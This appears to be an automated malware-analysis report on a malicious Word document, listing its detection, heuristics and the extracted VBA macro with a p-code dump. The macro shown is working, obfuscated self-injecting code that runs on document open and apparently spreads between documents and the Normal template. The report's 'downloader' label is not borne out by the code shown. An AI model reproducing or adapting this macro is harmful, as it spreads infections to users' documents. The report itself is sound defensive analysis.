Verdict: MALICIOUS
Risk Score: 120

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Bleed-2'. It contains a Document_Open VBA macro, which runs automatically when the document is opened. The macro holds obfuscated strings that are XOR-decoded with the single-byte key 151 to reveal a payload, which is then inserted into the document's own VBA code module at runtime, so the real macro body never appears in the stored document. This indicates the document is likely a downloader for a second-stage malicious payload.
Heuristics (3)
- ClamAV: Doc.Trojan.Bleed-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Bleed-2
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6777 bytes |

SHA-256 (macros.bas): 6e357c2bcd39451d2e7a09e2e37167a2d50787bc68bcd43997857f0d56b80744
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim jacky(15) As String
' 15 XOR-obfuscated source lines; each is decoded with key 151 by dc() below
jacky(1) = "Øù·Òååøå·Åòäâúò·Ùòïã·Äòã·ò·ª·ÚöôåøÔøùãöþùòå·ã·ª·¦"
jacky(2) = "ÄòãÖããå·ÙøåúöûÃòúçûöãò¹ÑâûûÙöúò»·áõÙøåúöû"
jacky(3) = "Äòã·à·ª·ò¹ÁÕÇåøýòôã·Øçãþøùä¹ÁþåâäÇåøãòôãþøù·ª·¿Åùó·½·§¾·Øçãþøùä¹ÄöáòÙøåúöûÇåøúçã·ª·¿Åùó·½·§¾"
jacky(4) = "Äòã·û·ª·à¹ÁÕÔøúçøùòùãä¿ã¾·Äòã·ð·ª·û¹ÔøóòÚøóâûò"
jacky(5) = "Äòã·ä·ª·ÙøåúöûÃòúçûöãò·Äòã·ãÿ·ª·ä¹ÁÕÇåøýòôã¹ÁÕÔøúçøùòùãä¿ã¾¹ÔøóòÚøóâûò"
jacky(6) = "õ·ª·ð¹ûþùòä¿ã»·¥¡¾·±·áõÔå·±·ð¹ûþùòä¿£¤»·¦¾"
jacky(7) = "Þñ·ò·ª·ä·Ãÿòù"
jacky(8) = "Äòã·ä·ª·ÖôãþáòÓøôâúòùã·Äòã·ãÿ·ª·ä¹ÁÕÇåøýòôã¹ÁÕÔøúçøùòùãä¿ã¾¹ÔøóòÚøóâûò"
jacky(9) = "Òùó·Þñ"
jacky(10) = "Þñ·ãÿ¹ûþùòä¿ã»·ã¾·ª·§·Ãÿòù"
jacky(11) = "ãÿ¹ÓÒûÒãòÛÞùòÄ·ã»·ãÿ¹ôØâùãøñÛÞùÒä·ãÿ¹ÖóóÑåøúÄãåþùð·õ"
jacky(12) = "Òùó·Þñ"
jacky(13) = "ÃÿþäÓøôâúòùã¹ÁÕÇåøýòôã¹ÁÕÔøúçøùòùãä¿ã¾¹ÔøóòÚøóâûò¹ÓÒûÒãòÛÞùòÄ·¥ »·¦¡"
jacky(14) = "Þñ·Óöî¿Ùøà¿¾¾·ª·¿Þùã¿Åùó·½·¦¢¾¾·Ãÿòù·ÚäðÕøï·µÔþöø·Äûöðòÿöúúòå¶·Ôøúò·äãöþ¨µ»·§»·µÔûöää¹Äûöðòÿöúúòå·ë·ýöôü·ãàøñûøàòå·¸·ÛþùòÍòå§·¸·Úòãöçÿöäòµ"
jacky(15) = "ÖôãþáòÓøôâúòùã¹ÄöáòÖä·ÖôãþáòÓøôâúòùã¹ÑâûûÙöúò"
' Decode all 15 lines into V, then write them into this module at line 27
' (only if line 28 is still empty), so the real payload exists only at runtime
For y = 1 To 15: V = V & dc(jacky(y), 151) & vbCr: Next
If ThisDocument.VBProject.VBComponents(1).CodeModule.lines(28, 1) = "" Then ThisDocument.VBProject.VBComponents(1).CodeModule.InsertLines 27, V
differ
End Sub
' Single-byte XOR decoder: each character of a is XORed with key e
Private Function dc(a, e)
For i = 1 To Len(a): t = t & Chr(Asc(Mid(a, i, 1)) Xor e): Next i
dc = t
End Function
' Empty stub; its body is filled by the InsertLines call above
Private Sub differ()
End Sub
' Processing file: /opt/analyzer/scan_staging/4dd05c1f52804a129d5fa98413c1f6aa.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 9474 bytes
' Line #0:
'   FuncDefn (Private Sub Document_Open())
' Line #1:
'   Dim
'   OptionBase
'   LitDI2 0x000F
'   VarDefn jacky (As String)
' Line #2:
'   LitStr 0x0033 "Øù·Òååøå·Åòäâúò·Ùòïã·Äòã·ò·ª·ÚöôåøÔøùãöþùòå·ã·ª·¦"
'   LitDI2 0x0001
'   ArgsSt jacky 0x0001
' Line #3:
'   LitStr 0x0029 "ÄòãÖããå·ÙøåúöûÃòúçûöãò¹ÑâûûÙöúò»·áõÙøåúöû"
'   LitDI2 0x0002
'   ArgsSt jacky 0x0001
' Line #4:
'   LitStr 0x005E "Äòã·à·ª·ò¹ÁÕÇåøýòôã·Øçãþøùä¹ÁþåâäÇåøãòôãþøù·ª·¿Åùó·½·§¾·Øçãþøùä¹ÄöáòÙøåúöûÇåøúçã·ª·¿Åùó·½·§¾"
'   LitDI2 0x0003
'   ArgsSt jacky 0x0001
' Line #5:
'   LitStr 0x002F "Äòã·û·ª·à¹ÁÕÔøúçøùòùãä¿ã¾·Äòã·ð·ª·û¹ÔøóòÚøóâûò"
'   LitDI2 0x0004
'   ArgsSt jacky 0x0001
' Line #6:
'   LitStr 0x0047 "Äòã·ä·ª·ÙøåúöûÃòúçûöãò·Äòã·ãÿ·ª·ä¹ÁÕÇåøýòôã¹ÁÕÔøúçøùòùãä¿ã¾¹ÔøóòÚøóâûò"
'   LitDI2 0x0005
'   ArgsSt jacky 0x0001
' Line #7:
'   LitStr 0x002A "õ·ª·ð¹ûþùòä¿ã»·¥¡¾·±·áõÔå·±·ð¹ûþùòä¿£¤»·¦¾"
'   LitDI2 0x0006
'   ArgsSt jacky 0x0001
' Line #8:
'   LitStr 0x000D "Þñ·ò·ª·ä·Ãÿòù"
'   LitDI2 0x0007
'   ArgsSt jacky 0x0001
' Line #9:
'   LitStr 0x0047 "Äòã·ä·ª·ÖôãþáòÓøôâúòùã·Äòã·ãÿ·ª·ä¹ÁÕÇåøýòôã¹ÁÕÔøúçøùòùãä¿ã¾¹ÔøóòÚøóâûò"
'   LitDI2 0x0008
'   ArgsSt jacky 0x0001
' Line #10:
'   LitStr 0x0006 "Òùó·Þñ"
'   LitDI2 0x0009
'   ArgsSt jacky 0x0001
' Line #11:
'   LitStr 0x001A "Þñ·ãÿ¹ûþùòä¿ã»·ã¾·ª·§·Ãÿòù"
'   LitDI2 0x000A
'   ArgsSt jacky 0x0001
' Line #12:
'   LitStr 0x0035 "ãÿ¹ÓÒûÒãòÛÞùòÄ·ã»·ãÿ¹ôØâùãøñÛÞùÒä·ãÿ¹ÖóóÑåøúÄãåþùð·õ"
'   LitDI2 0x000B
'   ArgsSt jacky 0x0001
' Line #13:
'   LitStr 0x0006 "Òùó·Þñ"
'   LitDI2 0x000C
'   ArgsSt jacky 0x0001
' Line #14:
'   LitStr 0x0044 "ÃÿþäÓøôâúòùã¹ÁÕÇåøýòôã¹ÁÕÔøúçøùòùãä¿ã¾¹ÔøóòÚøóâûò¹ÓÒûÒãòÛÞùòÄ·¥ »·¦¡"
'   LitDI2 0x000D
'   ArgsSt jacky 0x0001
' Line #15:
'   LitStr 0x008A "Þñ·Óöî¿Ùøà¿¾¾·ª·¿Þùã¿Åùó·½·¦¢¾¾·Ãÿòù·ÚäðÕøï·µÔþöø·Äûöðòÿöúúòå¶·Ôøúò·äãöþ¨µ»·§»·µÔûöää¹Äûöðòÿöúúòå·ë·ýöôü·ãàøñûøàòå·¸·ÛþùòÍòå§·¸·Úòãöçÿöäòµ"
'   LitDI2 0x000E
'   ArgsSt jacky 0x0001
' Line #16:
'   LitStr 0x002D "ÖôãþáòÓøôâúòùã¹ÄöáòÖä·ÖôãþáòÓøôâúòùã¹ÑâûûÙöúò"
'   LitDI2 0x000F
'   ArgsSt jacky 0x0001
' Line #17:
'   StartForVariable
'   Ld y
'   EndForVariable
'   LitDI2 0x0001
'   LitDI2 0x000F
'   For
'   BoS 0x0000
'   Ld V
'   Ld y
'   ArgsLd jacky 0x0001
'   LitDI2 0x0097
'   ArgsLd dc ... (truncated)
```